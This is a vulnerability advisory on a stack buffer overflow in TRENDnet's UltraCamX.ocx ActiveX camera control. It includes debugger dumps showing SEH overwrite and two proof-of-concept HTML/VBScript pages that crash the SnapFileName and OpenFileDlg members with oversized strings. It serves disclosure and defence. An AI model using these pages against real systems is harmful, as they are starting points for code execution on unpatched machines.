TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF Vendor: TRENDnet Product web page: http://www.trendnet.com Affected version: TV-IP422WN/TV-IP422W Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful dual-codec wireless network camera with the 2-way audio function that provides the high-quality image and on-the-spot audio via the Internet connection. Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to several functions in UltraCamLib, resulting in memory corruption overwriting severeal registers including the SEH. An attacker can gain access to the system of the affected node and execute arbitrary code. ----------------------------------------------------------------------------- 0:000> r eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 UltraCamX!DllUnregisterServer+0xeb2b: 100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=???????? 0:000> !exchain 0042eda8: 41414141 Invalid exception stack at 41414141 ----------------------------------------------------------------------------- Tested on: Microsoft Windows 7 Professional SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5211 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php 16.11.2014 --- Properties: ----------- FileDescription UltraCam ActiveX Control FileVersion 1, 1, 52, 16 InternalName UltraCamX OriginalFileName UltraCamX.ocx ProductName UltraCam device ActiveX Control ProductVersion 1, 1, 52, 16 List of members: ---------------- Interface IUltraCamX : IDispatch Default Interface: True Members : 62 RemoteHost RemotePort AccountCode GetConfigValue SetConfigValue SetCGIAPNAME Password UserName fChgImageSize ImgWidth ImgHeight SnapFileName AVIRecStart SetImgScale OpenFolder OpenFileDlg TriggerStatus AVIRecStatus Event_Frame PlayVideo SetAutoScale Event_Signal WavPlay CGI_ParamGet CGI_ParamSet MulticastEnable MulticastStatus SetPTUserAllow Vulnerable members of the class: -------------------------------- CGI_ParamSet OpenFileDlg SnapFileName Password SetCGIAPNAME AccountCode RemoteHost PoC(s): ------- <html> <object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' /> <script language='vbscript'> targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx" prototype = "Property Let SnapFileName As String" memberName = "SnapFileName" progid = "UltraCamLib.UltraCamX" argCount = 1 thricer=String(8212, "A") target.SnapFileName = thricer </script> </html> -- eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009 eip=1002228c esp=003befb4 ebp=003befbc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 UltraCamX!DllUnregisterServer+0x109bc: 1002228c 0fb64861 movzx ecx,byte ptr [eax+61h] ds:002b:414141a2=?? -- <html> <object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' /> <script language='vbscript'> targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx" prototype = "Function OpenFileDlg ( ByVal sFilter As String ) As String" memberName = "OpenFileDlg" progid = "UltraCamLib.UltraCamX" argCount = 1 thricer=String(2068, "A") target.OpenFileDlg thricer </script> </html> -- 0:000> r eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 UltraCamX!DllUnregisterServer+0xeb2b: 100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=???????? 0:000> !exchain 0042eda8: 41414141 Invalid exception stack at 41414141 --